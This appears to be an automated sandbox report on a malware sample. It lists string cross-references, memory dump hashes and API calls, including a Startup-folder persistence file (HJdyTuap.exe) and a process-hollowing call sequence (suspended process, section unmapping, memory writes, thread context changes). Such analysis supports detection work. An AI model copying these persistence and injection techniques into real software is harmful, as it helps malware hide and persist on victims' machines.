en, xrefs: 059C0CDE
lMem, xrefs: 059C07EC
urce, xrefs: 059C08CC
ad, xrefs: 059C09F5
NtTe, xrefs: 059C0930
Lock, xrefs: 059C0255
enPr, xrefs: 059C0301
\Kno, xrefs: 059C1252
Crea, xrefs: 059C10F6
\Kno, xrefs: 059C04EA
Cryp, xrefs: 059C06F5
Crea, xrefs: 059C134C
dll, xrefs: 059C0558
Cryp, xrefs: 059C066E
Find, xrefs: 059C01DD
nPai, xrefs: 059C11DE
Reso, xrefs: 059C025F
l, xrefs: 059C046D
l32., xrefs: 059C054E
Reso, xrefs: 059C08C2
Quit, xrefs: 059C1182
ddre, xrefs: 059C082C
ss, xrefs: 059C0FF5
W, xrefs: 059C01FB
Post, xrefs: 059C1178
l, xrefs: 059C12A7
wcsc, xrefs: 059C0C83
urce, xrefs: 059C0218
rtua, xrefs: 059C1018
tVal, xrefs: 059C0BDE
EndP, xrefs: 059C11A0
NtRe, xrefs: 059C07CE
Ex, xrefs: 059C1215
iteV, xrefs: 059C0971
tCur, xrefs: 059C0C51
l, xrefs: 059C0428
ctio, xrefs: 059C0F29
NtQu, xrefs: 059C10A6
just, xrefs: 059C0DB1
eate, xrefs: 059C1064
ath, xrefs: 059C0C79
ls32, xrefs: 059C03BF
dll, xrefs: 059C051C
py, xrefs: 059C0665
ls\a, xrefs: 059C04FE
NtOp, xrefs: 059C0BB1
le, xrefs: 059C0B7F
sact, xrefs: 059C0E84
wcsc, xrefs: 059C0FA0
indo, xrefs: 059C1155
Para, xrefs: 059C0E0B
.dll, xrefs: 059C05C5
ureA, xrefs: 059C0F5A
ecti, xrefs: 059C10BA
ey, xrefs: 059C064F
ow, xrefs: 059C10E7
s, xrefs: 059C035A
mems, xrefs: 059C0C93
2.dl, xrefs: 059C129D
Rect, xrefs: 059C11C4
ss, xrefs: 059C0F6E
Mess, xrefs: 059C0FB9
ndEn, xrefs: 059C0ADB
LdrL, xrefs: 059C0F7D
nel3, xrefs: 059C0459
Libr, xrefs: 059C0807
Cryp, xrefs: 059C0774
le, xrefs: 059C0BA2
ings, xrefs: 059C0B03
GetP, xrefs: 059C0818
iteF, xrefs: 059C0C29
tDes, xrefs: 059C077E
wcsc, xrefs: 059C104A
nt, xrefs: 059C11E8
onFi, xrefs: 059C0B75
wnDl, xrefs: 059C0530
Load, xrefs: 059C0204
eNam, xrefs: 059C0B34
wcsl, xrefs: 059C0CD4
NtWr, xrefs: 059C0967
\ker, xrefs: 059C044F
layE, xrefs: 059C0CB0
ExW, xrefs: 059C1114
Reso, xrefs: 059C020E
eryI, xrefs: 059C0B57
aryA, xrefs: 059C080E
NtOp, xrefs: 059C12DD
ster, xrefs: 059C1128
eate, xrefs: 059C0E70
NtWr, xrefs: 059C0C1F
Cryp, xrefs: 059C079C
umer, xrefs: 059C063B
Sect, xrefs: 059C0ABD
uire, xrefs: 059C0682
Clas, xrefs: 059C1132
ZwUn, xrefs: 059C099F
tion, xrefs: 059C0EF1
ose, xrefs: 059C1040
GetM, xrefs: 059C0B16
NtEn, xrefs: 059C0631
Show, xrefs: 059C10D3
ls\O, xrefs: 059C05B1
ateH, xrefs: 059C06BA
ueKe, xrefs: 059C0BE8
eate, xrefs: 059C12BA
Load, xrefs: 059C0800
eroM, xrefs: 059C0913
NtAd, xrefs: 059C0DA7
lMem, xrefs: 059C1022
NtCr, xrefs: 059C105A
NtCr, xrefs: 059C0CED
rPro, xrefs: 059C0E4C
Reso, xrefs: 059C01E7
NtQu, xrefs: 059C031E
rs, xrefs: 059C0E1F
NtQu, xrefs: 059C0B4D
ead, xrefs: 059C0D66
NtRe, xrefs: 059C0B8E
NtSe, xrefs: 059C0A04
mp, xrefs: 059C0FAA
iewO, xrefs: 059C09B3
NtQu, xrefs: 059C0279
ls32, xrefs: 059C1266
ser3, xrefs: 059C0580
text, xrefs: 059C0A18
rmin, xrefs: 059C093A
2.dl, xrefs: 059C058A
w64P, xrefs: 059C0FE1
y, xrefs: 059C0927
reat, xrefs: 059C0E38
y, xrefs: 059C0BF2
troy, xrefs: 059C0788
aint, xrefs: 059C11AA
eUse, xrefs: 059C0E42
le, xrefs: 059C0BC5
mete, xrefs: 059C0E15
mInf, xrefs: 059C0297
at, xrefs: 059C0C8A
enKe, xrefs: 059C05F6
sW, xrefs: 059C113C
enFi, xrefs: 059C0BBB
mory, xrefs: 059C098F
Begi, xrefs: 059C11D4
ey, xrefs: 059C0713
esTo, xrefs: 059C0DCF
ss, xrefs: 059C0836
itia, xrefs: 059C1201
\Kno, xrefs: 059C0431
reat, xrefs: 059C0DED
alue, xrefs: 059C061D
s, xrefs: 059C0315
viro, xrefs: 059C0AE5
sW, xrefs: 059C08FA
ory, xrefs: 059C02ED
eate, xrefs: 059C0CF7
Fill, xrefs: 059C11BA
eryI, xrefs: 059C0328
tDec, xrefs: 059C075A
tion, xrefs: 059C09C7
rren, xrefs: 059C0ED3
\adv, xrefs: 059C040A
NtAl, xrefs: 059C02BB
rocA, xrefs: 059C0822
ls32, xrefs: 059C0400
Cryp, xrefs: 059C06CE
RtlF, xrefs: 059C0C3D
urce, xrefs: 059C0269
Key, xrefs: 059C0792

Memory Dump Source

Source File: 00000000.00000002.512894975.00000000059C0000.00000040.00000001.sdmp, Offset: 059C0000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: .dll$.dll$.dll$2.dl$2.dl$2.dl$2.dl$32.d$Begi$Clas$CoCr$CoIn$Cont$Cont$Crea$Crea$Crea$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$DefW$EndP$Ex$ExW$Expa$File$Fill$Find$Free$GetM$GetP$GetS$Hash$Inst$IsWo$KERNEL32.DLL$Key$Key$KeyP$LdrG$LdrL$Libr$Load$Load$Lock$Memo$Mess$Mess$Muta$NtAd$NtAl$NtCl$NtCo$NtCr$NtCr$NtCr$NtCr$NtCr$NtDe$NtEn$NtFr$NtGe$NtMa$NtOp$NtOp$NtOp$NtOp$NtOp$NtOp$NtPr$NtQu$NtQu$NtQu$NtQu$NtQu$NtRe$NtRe$NtRe$NtSe$NtSe$NtTe$NtWr$NtWr$Ole3$Para$Post$Priv$Proc$Quit$Rect$Regi$Reso$Reso$Reso$Reso$RtlC$RtlC$RtlC$RtlF$RtlS$RtlZ$Sect$Show$Size$Thre$Thre$Thre$Thre$Tran$User$User$W$W$Wind$ZwCr$ZwRo$ZwUn$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Ole$\adv$\ker$\ntd$\use$a$ad$ad$ad$adEx$adFi$adVi$age$ageB$aint$alMe$alue$ance$ansa$api3$aryA$ash$at$ateH$ateK$ateP$ath$cW$ce$cess$cess$ckTr$ctio$ctio$ddre$ddre$dll$dll$dll$dvap$eA$eFil$eNam$ePro$eUse$eUse$ead$ease$eate$eate$eate$eate$eate$eate$eate$ecti$ecti$eeVi$emor$en$en$enFi$enKe$enMu$enPr$enPr$enSe$erne$eroM$eryI$eryI$eryS$eryS$eryV$esTo$ess$et$etCu$etPr$ext$extW$ey$ey$fSec$hDat$i32.$iewO$ile$ileg$indo$ings$ion$ion$irtu$iteF$iteV$itia$iveK$just$ken$kernel32.dll$l$l$l$l$l32.$lMem$lMem$lMem$layE$le$le$le$le32$lenW$lize$ll$ll$ll$ll.d$llba$loca$ls32$ls32$ls32$ls32$ls32$ls\O$ls\a$ls\k$ls\n$ls\u$lstr$mInf$mInf$mapV$mati$mati$mbstowcs$memc$mems$mete$mory$mp$n$n$nPai$ndEn$ndow$nel3$nfor$nfor$nmen$nsac$nt$nt$ntin$o$oadD$oced$oces$oces$oces$oces$odul$ofRe$ombs$on$on$onFi$onPr$orma$orma$ory$ory$ory$ose$otec$ow$oxA$pVie$py$py$r32.$rPro$rThr$reat$reat$reat$rent$rmin$rocA$roce$roce$rren$rs$rtua$rtua$rtua$ry$rypt$s$s$sTok$sW$sW$sact$ser3$sour$ss$ss$ss$ss$ster$strlenuser32.dlladvapi32.dll$sume$tAcq$tCon$tCon$tCre$tCur$tDec$tDer$tDes$tDes$tHas$tRel$tStr$tTra$tVal$tVir$tant$tdll$teMu$tePr$teVi$teWi$texW$text$text$tion$tion$tion$tion$troy$troy$tual$ue$ueKe$uire$umer$urce$urce$urce$urce$ureA$viro$w64P$wOfS$wPro$wcsc$wcsc$wcsc$wcsl$wcst$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$xecu$y$y$y$yste$yste
API String ID: 2380476227-789266925
Opcode ID: e1c8b8bd4b5ecb10a97f64f7ee6ba6fe0aa344d9b0ca8cf844e0ae7bf0994be2
Instruction ID: 36ffb07b3e4519769759636ad259c7dd92e0016055e25f7e7df1b44e91d417f3
Opcode Fuzzy Hash: e1c8b8bd4b5ecb10a97f64f7ee6ba6fe0aa344d9b0ca8cf844e0ae7bf0994be2
Instruction Fuzzy Hash: A7D2BFB1C0526C8ACF21DFA18D89BCEBBB8BF55701F1181DAD148AB215DB319B84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 059D01CB, Relevance: 517.4, Strings: 413, Instructions: 1134COMMON

Download Yara Rule

Strings

etPr, xrefs: 059D0F46
n, xrefs: 059D0EB6
ZwRo, xrefs: 059D0F01
ken, xrefs: 059D0DD9
strlenuser32.dlladvapi32.dll, xrefs: 059D1348, 059D134B
ateK, xrefs: 059D0645
User, xrefs: 059D106E
pVie, xrefs: 059D0A7C
ageB, xrefs: 059D0FC3
oadD, xrefs: 059D0F87
w64P, xrefs: 059D0FE1
Rect, xrefs: 059D11C4
RtlC, xrefs: 059D0DE3
Clas, xrefs: 059D1132
oces, xrefs: 059D0D84
ry, xrefs: 059D08A9
NtOp, xrefs: 059D05EC
Cont, xrefs: 059D068C
tdll, xrefs: 059D04D0
urce, xrefs: 059D0269
mp, xrefs: 059D0FAA
NtCr, xrefs: 059D0BFB
NtRe, xrefs: 059D07CE
nsac, xrefs: 059D0EE7
Muta, xrefs: 059D12C4
ctio, xrefs: 059D0F29
CoCr, xrefs: 059D1224
RtlS, xrefs: 059D0EBF
tual, xrefs: 059D0895
NtAl, xrefs: 059D02BB
wnDl, xrefs: 059D043B
ls32, xrefs: 059D0400
dll, xrefs: 059D04A8
roce, xrefs: 059D0FEB
32.d, xrefs: 059D127A
mems, xrefs: 059D0C93
py, xrefs: 059D0665
NtCr, xrefs: 059D12B0
rocA, xrefs: 059D0822
ll.d, xrefs: 059D03D3
Find, xrefs: 059D01DD
ntin, xrefs: 059D0D25
tion, xrefs: 059D0CC4
troy, xrefs: 059D0788
tCon, xrefs: 059D0A45
Ex, xrefs: 059D1215
NtMa, xrefs: 059D0A72
le, xrefs: 059D0BC5
iveK, xrefs: 059D0709
eate, xrefs: 059D0C05
l, xrefs: 059D046D
ls32, xrefs: 059D1266
mInf, xrefs: 059D0377
itia, xrefs: 059D1201
Cryp, xrefs: 059D0774
text, xrefs: 059D0A4F
\Kno, xrefs: 059D03EC
NtPr, xrefs: 059D0877
Key, xrefs: 059D0792
Memo, xrefs: 059D089F
Lock, xrefs: 059D0255
ath, xrefs: 059D0C79
Thre, xrefs: 059D0A59
eryS, xrefs: 059D10B0
en, xrefs: 059D0CDE
ls\a, xrefs: 059D04FE
teVi, xrefs: 059D02CF
ls\O, xrefs: 059D05B1
Tran, xrefs: 059D0E7A
rs, xrefs: 059D0E1F
Size, xrefs: 059D0228
esTo, xrefs: 059D0DCF
\Kno, xrefs: 059D04B2
mapV, xrefs: 059D09A9
oces, xrefs: 059D08F0
eA, xrefs: 059D0B3E
ce, xrefs: 059D0246
texW, xrefs: 059D1360
LdrL, xrefs: 059D0F7D
reat, xrefs: 059D0E38
tTra, xrefs: 059D0EDD
ext, xrefs: 059D07C4
mati, xrefs: 059D0B6B
wcsc, xrefs: 059D0C83
ey, xrefs: 059D064F
a, xrefs: 059D06EC
Para, xrefs: 059D0E0B
ess, xrefs: 059D1082
sTok, xrefs: 059D0D8E
Key, xrefs: 059D0627
ow, xrefs: 059D10E7
Post, xrefs: 059D1178
Load, xrefs: 059D0800
sume, xrefs: 059D09E1
rtua, xrefs: 059D1018
RtlZ, xrefs: 059D0909
ecti, xrefs: 059D0A90
tHas, xrefs: 059D06D8
tCur, xrefs: 059D0C51
NtAd, xrefs: 059D0DA7
rmin, xrefs: 059D093A
eNam, xrefs: 059D0B34
urce, xrefs: 059D01F1
NtQu, xrefs: 059D10A6
lize, xrefs: 059D120B
Cryp, xrefs: 059D06F5
eryV, xrefs: 059D0613
eUse, xrefs: 059D0E42
ory, xrefs: 059D02ED
py, xrefs: 059D1051
ctio, xrefs: 059D0EAC
ndEn, xrefs: 059D0ADB
enPr, xrefs: 059D0301
lMem, xrefs: 059D07EC
ls32, xrefs: 059D048A
NtSe, xrefs: 059D0BD4
o, xrefs: 059D0381
Hash, xrefs: 059D0740
nPai, xrefs: 059D11DE
ureA, xrefs: 059D0F5A
eate, xrefs: 059D122E
wnDl, xrefs: 059D0480
NtCl, xrefs: 059D1036
i32., xrefs: 059D0512
adFi, xrefs: 059D0B98
Crea, xrefs: 059D08DC
NtWr, xrefs: 059D0967
GetM, xrefs: 059D0B16
Reso, xrefs: 059D01E7
teWi, xrefs: 059D1100
ombs, xrefs: 059D1096
Load, xrefs: 059D0204
wcsl, xrefs: 059D0CD4
on, xrefs: 059D10C4
NtQu, xrefs: 059D0B4D
tVir, xrefs: 059D088B
NtOp, xrefs: 059D12DD
odul, xrefs: 059D0B20
enSe, xrefs: 059D0EA2
tAcq, xrefs: 059D0678
ll, xrefs: 059D0F91
teMu, xrefs: 059D1356
wnDl, xrefs: 059D125C
loca, xrefs: 059D02C5
ileg, xrefs: 059D0DC5
ey, xrefs: 059D0713
ll, xrefs: 059D03DD
sW, xrefs: 059D113C
rypt, xrefs: 059D0764
troy, xrefs: 059D0736
cW, xrefs: 059D1169
l, xrefs: 059D0594
ateH, xrefs: 059D06BA
DefW, xrefs: 059D114B
erne, xrefs: 059D0544
GetP, xrefs: 059D0818
tDes, xrefs: 059D077E
NtRe, xrefs: 059D0B8E
ory, xrefs: 059D102C
en, xrefs: 059D0D98
eate, xrefs: 059D0CF7
nt, xrefs: 059D11E8
Reso, xrefs: 059D08C2
le, xrefs: 059D0B7F
rren, xrefs: 059D0ED3
tRel, xrefs: 059D07A6
tion, xrefs: 059D02AB
wcst, xrefs: 059D108C
NtDe, xrefs: 059D0CA6
reat, xrefs: 059D0D48
2.dl, xrefs: 059D041E
\ker, xrefs: 059D044F
enPr, xrefs: 059D0D7A
mete, xrefs: 059D0E15
nel3, xrefs: 059D0459
alue, xrefs: 059D061D
NtQu, xrefs: 059D031E
ile, xrefs: 059D0C33
Regi, xrefs: 059D111E
tDes, xrefs: 059D072C
tDer, xrefs: 059D06FF
et, xrefs: 059D0C9D
ExW, xrefs: 059D1114
l32., xrefs: 059D054E
tion, xrefs: 059D0EF1
indo, xrefs: 059D1155
.dll, xrefs: 059D05C5
Priv, xrefs: 059D0DBB
kernel32.dll, xrefs: 059D137C, 059D137F
eroM, xrefs: 059D0913
ZwCr, xrefs: 059D0E66
Fill, xrefs: 059D11BA
nfor, xrefs: 059D0B61
wnDl, xrefs: 059D0530
User, xrefs: 059D0C65
ueKe, xrefs: 059D0BE8
ansa, xrefs: 059D0F1F
Mess, xrefs: 059D0FB9
le, xrefs: 059D0BA2
nt, xrefs: 059D12CE
ings, xrefs: 059D0B03
NtSe, xrefs: 059D0A04
Crea, xrefs: 059D10F6
cess, xrefs: 059D0E56
Cryp, xrefs: 059D066E
Quit, xrefs: 059D1182
ecti, xrefs: 059D10BA
sour, xrefs: 059D023C
Cryp, xrefs: 059D0722
etCu, xrefs: 059D0EC9
adVi, xrefs: 059D07D8
Reso, xrefs: 059D020E
Thre, xrefs: 059D09EB
tion, xrefs: 059D09C7
NtOp, xrefs: 059D0BB1
yste, xrefs: 059D036D
rtua, xrefs: 059D02D9
wnDl, xrefs: 059D03B5
eFil, xrefs: 059D0B2A
llba, xrefs: 059D0F0B
wcsc, xrefs: 059D104A
at, xrefs: 059D0C8A
adEx, xrefs: 059D0D0B
ckTr, xrefs: 059D0F15
alMe, xrefs: 059D0985
y, xrefs: 059D0BF2
ad, xrefs: 059D09F5
RtlC, xrefs: 059D0D3E
lstr, xrefs: 059D085D
mati, xrefs: 059D033C
dvap, xrefs: 059D0508
GetS, xrefs: 059D0363
extW, xrefs: 059D0696
Sect, xrefs: 059D0ABD
ss, xrefs: 059D0F6E
NtQu, xrefs: 059D0609
tCon, xrefs: 059D0A0E
s, xrefs: 059D035A
Wind, xrefs: 059D10DD
ue, xrefs: 059D0D2F
iteV, xrefs: 059D0971
rtua, xrefs: 059D07E2
eate, xrefs: 059D12BA
urce, xrefs: 059D08CC
rThr, xrefs: 059D0D5C
wnDl, xrefs: 059D03F6
Cryp, xrefs: 059D0750
rent, xrefs: 059D0C5B
age, xrefs: 059D1196
ddre, xrefs: 059D0F64
KeyP, xrefs: 059D0C6F
ad, xrefs: 059D0A2C
eate, xrefs: 059D0E70
ls\k, xrefs: 059D053A
ls\u, xrefs: 059D0576
KERNEL32.DLL, xrefs: 059D1392, 059D1398
ser3, xrefs: 059D0580
enKe, xrefs: 059D05F6
\Kno, xrefs: 059D059D
eeVi, xrefs: 059D100E
NtTe, xrefs: 059D0930
ory, xrefs: 059D07F6
fSec, xrefs: 059D09BD
uire, xrefs: 059D0682
2.dl, xrefs: 059D129D
eUse, xrefs: 059D0D52
NtGe, xrefs: 059D0A3B
y, xrefs: 059D0927
ll, xrefs: 059D1284
ash, xrefs: 059D06C4
Cryp, xrefs: 059D06A6
.dll, xrefs: 059D04DA
wcsc, xrefs: 059D0FA0
xecu, xrefs: 059D0CBA
hDat, xrefs: 059D06E2
onPr, xrefs: 059D0346
enMu, xrefs: 059D12E7
y, xrefs: 059D0600
reat, xrefs: 059D0DED
Ole3, xrefs: 059D1293
oces, xrefs: 059D0350
n, xrefs: 059D0F33
ls\n, xrefs: 059D04C6
Cryp, xrefs: 059D06CE
\ntd, xrefs: 059D03C9
Proc, xrefs: 059D1078
ss, xrefs: 059D0836
NtOp, xrefs: 059D0D70
2.dl, xrefs: 059D0463
NtCr, xrefs: 059D0AA9
ance, xrefs: 059D1242
tStr, xrefs: 059D0AF9
nmen, xrefs: 059D0AEF
api3, xrefs: 059D0414
W, xrefs: 059D01FB
r32., xrefs: 059D049E
wnDl, xrefs: 059D04BC
emor, xrefs: 059D091D
Show, xrefs: 059D10D3
s, xrefs: 059D0315
onFi, xrefs: 059D0B75
iteF, xrefs: 059D0C29
orma, xrefs: 059D0C47
on, xrefs: 059D0A9A
File, xrefs: 059D0C0F
nfor, xrefs: 059D0332
ion, xrefs: 059D0AC7
\adv, xrefs: 059D040A
oces, xrefs: 059D030B
sact, xrefs: 059D0E84
eryI, xrefs: 059D0B57
eryS, xrefs: 059D0283
aryA, xrefs: 059D080E
ddre, xrefs: 059D082C
CoIn, xrefs: 059D11F7
LdrG, xrefs: 059D0F3C
NtOp, xrefs: 059D02F7
wnDl, xrefs: 059D05A7
Mess, xrefs: 059D118C
rPro, xrefs: 059D0E4C
ePro, xrefs: 059D0DF7
wPro, xrefs: 059D115F
NtQu, xrefs: 059D0279
sW, xrefs: 059D08FA
ss, xrefs: 059D0958
\Kno, xrefs: 059D1252
\Kno, xrefs: 059D0526
Thre, xrefs: 059D0A22
l, xrefs: 059D0428
ead, xrefs: 059D0D66
oced, xrefs: 059D0F50
iewO, xrefs: 059D09B3
oxA, xrefs: 059D0FCD
memc, xrefs: 059D065E
viro, xrefs: 059D0AE5
enFi, xrefs: 059D0BBB
Inst, xrefs: 059D1238
wOfS, xrefs: 059D0A86
urce, xrefs: 059D0218
wnDl, xrefs: 059D056C
Crea, xrefs: 059D134C
roce, xrefs: 059D094E
dll, xrefs: 059D051C
eate, xrefs: 059D0AB3
ateP, xrefs: 059D0944
le32, xrefs: 059D05BB
ose, xrefs: 059D1040
text, xrefs: 059D0A18
NtCr, xrefs: 059D105A
tant, xrefs: 059D12F1
ls32, xrefs: 059D03BF
\Kno, xrefs: 059D03AB
mbstowcs, xrefs: 059D1371, 059D1374
IsWo, xrefs: 059D0FD7
\Kno, xrefs: 059D0431
Reso, xrefs: 059D025F
ofRe, xrefs: 059D0232
ZwUn, xrefs: 059D099F
cess, xrefs: 059D0E01
Free, xrefs: 059D08B8
Begi, xrefs: 059D11D4
\Kno, xrefs: 059D04EA
NtCo, xrefs: 059D0D1B
ster, xrefs: 059D1128
EndP, xrefs: 059D11A0
ls32, xrefs: 059D0445
lMem, xrefs: 059D02E3
tDec, xrefs: 059D075A
\Kno, xrefs: 059D0562
umer, xrefs: 059D063B
\Ole, xrefs: 059D1270
just, xrefs: 059D0DB1
Libr, xrefs: 059D0807
RtlF, xrefs: 059D0C3D
ad, xrefs: 059D0A63
mInf, xrefs: 059D0297
.dll, xrefs: 059D0853
orma, xrefs: 059D02A1
ion, xrefs: 059D0E8E
NtFr, xrefs: 059D1004
layE, xrefs: 059D0CB0
otec, xrefs: 059D0881
lMem, xrefs: 059D1022
tePr, xrefs: 059D08E6
RtlC, xrefs: 059D0E2E
Cont, xrefs: 059D07BA
ss, xrefs: 059D0FF5
Expa, xrefs: 059D0AD1
eryI, xrefs: 059D0328
Cryp, xrefs: 059D079C
NtOp, xrefs: 059D0E98
aint, xrefs: 059D11AA
W, xrefs: 059D0B0D
eate, xrefs: 059D1064
mory, xrefs: 059D098F
ease, xrefs: 059D07B0
Thre, xrefs: 059D0D01
tVal, xrefs: 059D0BDE
wnDl, xrefs: 059D04F4
NtWr, xrefs: 059D0C1F
NtEn, xrefs: 059D0631
dll, xrefs: 059D0558
2.dl, xrefs: 059D058A
ndow, xrefs: 059D110A
tCre, xrefs: 059D06B0
NtRe, xrefs: 059D09D7
NtCr, xrefs: 059D0CED
l, xrefs: 059D12A7
yste, xrefs: 059D028D
irtu, xrefs: 059D097B
lenW, xrefs: 059D0867
\Kno, xrefs: 059D0476
\use, xrefs: 059D0494

Memory Dump Source

Source File: 00000000.00000002.512913151.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: .dll$.dll$.dll$2.dl$2.dl$2.dl$2.dl$32.d$Begi$Clas$CoCr$CoIn$Cont$Cont$Crea$Crea$Crea$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$DefW$EndP$Ex$ExW$Expa$File$Fill$Find$Free$GetM$GetP$GetS$Hash$Inst$IsWo$KERNEL32.DLL$Key$Key$KeyP$LdrG$LdrL$Libr$Load$Load$Lock$Memo$Mess$Mess$Muta$NtAd$NtAl$NtCl$NtCo$NtCr$NtCr$NtCr$NtCr$NtCr$NtDe$NtEn$NtFr$NtGe$NtMa$NtOp$NtOp$NtOp$NtOp$NtOp$NtOp$NtPr$NtQu$NtQu$NtQu$NtQu$NtQu$NtRe$NtRe$NtRe$NtSe$NtSe$NtTe$NtWr$NtWr$Ole3$Para$Post$Priv$Proc$Quit$Rect$Regi$Reso$Reso$Reso$Reso$RtlC$RtlC$RtlC$RtlF$RtlS$RtlZ$Sect$Show$Size$Thre$Thre$Thre$Thre$Tran$User$User$W$W$Wind$ZwCr$ZwRo$ZwUn$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Ole$\adv$\ker$\ntd$\use$a$ad$ad$ad$adEx$adFi$adVi$age$ageB$aint$alMe$alue$ance$ansa$api3$aryA$ash$at$ateH$ateK$ateP$ath$cW$ce$cess$cess$ckTr$ctio$ctio$ddre$ddre$dll$dll$dll$dvap$eA$eFil$eNam$ePro$eUse$eUse$ead$ease$eate$eate$eate$eate$eate$eate$eate$ecti$ecti$eeVi$emor$en$en$enFi$enKe$enMu$enPr$enPr$enSe$erne$eroM$eryI$eryI$eryS$eryS$eryV$esTo$ess$et$etCu$etPr$ext$extW$ey$ey$fSec$hDat$i32.$iewO$ile$ileg$indo$ings$ion$ion$irtu$iteF$iteV$itia$iveK$just$ken$kernel32.dll$l$l$l$l$l32.$lMem$lMem$lMem$layE$le$le$le$le32$lenW$lize$ll$ll$ll$ll.d$llba$loca$ls32$ls32$ls32$ls32$ls32$ls\O$ls\a$ls\k$ls\n$ls\u$lstr$mInf$mInf$mapV$mati$mati$mbstowcs$memc$mems$mete$mory$mp$n$n$nPai$ndEn$ndow$nel3$nfor$nfor$nmen$nsac$nt$nt$ntin$o$oadD$oced$oces$oces$oces$oces$odul$ofRe$ombs$on$on$onFi$onPr$orma$orma$ory$ory$ory$ose$otec$ow$oxA$pVie$py$py$r32.$rPro$rThr$reat$reat$reat$rent$rmin$rocA$roce$roce$rren$rs$rtua$rtua$rtua$ry$rypt$s$s$sTok$sW$sW$sact$ser3$sour$ss$ss$ss$ss$ster$strlenuser32.dlladvapi32.dll$sume$tAcq$tCon$tCon$tCre$tCur$tDec$tDer$tDes$tDes$tHas$tRel$tStr$tTra$tVal$tVir$tant$tdll$teMu$tePr$teVi$teWi$texW$text$text$tion$tion$tion$tion$troy$troy$tual$ue$ueKe$uire$umer$urce$urce$urce$urce$ureA$viro$w64P$wOfS$wPro$wcsc$wcsc$wcsc$wcsl$wcst$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$xecu$y$y$y$yste$yste
API String ID: 2380476227-789266925
Opcode ID: 4197db9f150f0316b6c37499bb492c3d7884a7e4a752e5eaa95b81e883f7899f
Instruction ID: 7766aa255ab5fee0126e177eb3422867443274d59039567a4775bcdc03617e9e
Opcode Fuzzy Hash: 4197db9f150f0316b6c37499bb492c3d7884a7e4a752e5eaa95b81e883f7899f
Instruction Fuzzy Hash: EDD2B0B1C052689ACF21DFA1CD89BCEBBB8BF55701F1081DAD148AB215EB319B84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 059C1D7F, Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 209filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 059C1C2B: NtQueryInformationProcess.NTDLL(000000FF,00000000,?,00000018,00000000), ref: 059C1C6F
Part of subcall function 059C1C2B: NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 059C1CFF
Part of subcall function 059C1C2B: NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 059C1D3B

NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 059C1F6A
NtCreateFile.NTDLL(?,00120116,?,?,00000000,00000080,00000000,00000005,00000040,00000000,00000000), ref: 059C2015
NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 059C2048

Strings

\??\, xrefs: 059C1E7D, 059C1E80
\??\, xrefs: 059C1E8E, 059C1E94
wcsl, xrefs: 059C1F9D
en, xrefs: 059C1EFC
wcsl, xrefs: 059C1EF5
en, xrefs: 059C1FA4
\??\, xrefs: 059C2059
%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe, xrefs: 059C1E14, 059C1E17

Memory Dump Source

Source File: 00000000.00000002.512894975.00000000059C0000.00000040.00000001.sdmp, Offset: 059C0000, based on PE: false

Similarity

API ID: File$Open$AllocateCreateInformationMemoryProcessQueryVirtualWrite
String ID: %appdata%\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe$\??\$\??\$\??\$en$en$wcsl$wcsl
API String ID: 2302177389-3011451884
Opcode ID: 4c2eb43af622bb57117c5c74932a5e8d34e257fcc8bc93f0bc25276c3d265d2d
Instruction ID: e7bd74eac41a8cd45044c1196e3b24f66d55ef5e5c14ae10545ea69e86f000e5
Opcode Fuzzy Hash: 4c2eb43af622bb57117c5c74932a5e8d34e257fcc8bc93f0bc25276c3d265d2d
Instruction Fuzzy Hash: 1091D2B2D002599FDB21DFA4DC85BDEBBB8BF09700F10419AE519EB251DB309A84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 059D1C09, Relevance: 18.2, APIs: 12, Instructions: 225nativethreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 059D1CB7
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 059D1CDC
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 059D1CF6
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 059D1D41
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 059D1D66
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 059D1DA9
NtTerminateProcess.NTDLL(?,00000000), ref: 059D1DB7
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 059D1DC2
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 059D1E36
NtGetContextThread.NTDLL(?,?), ref: 059D1E50
NtSetContextThread.NTDLL(?,00010007), ref: 059D1E74
NtResumeThread.NTDLL(?,00000000), ref: 059D1E86

Memory Dump Source

Source File: 00000000.00000002.512913151.00000000059D0000.00000040.00000001.sdmp, Offset: 059D0000, based on PE: false

Similarity

API ID: Section$ProcessThreadView$ContextCreateMemoryVirtual$InformationQueryReadResumeTerminateUnmapWrite
String ID:
API String ID: 3848664822-0
Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction ID: f1f7b8be6031bf99b8d948e224be18223e3eaeb5ff226423090a08bbb0d41e40
Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
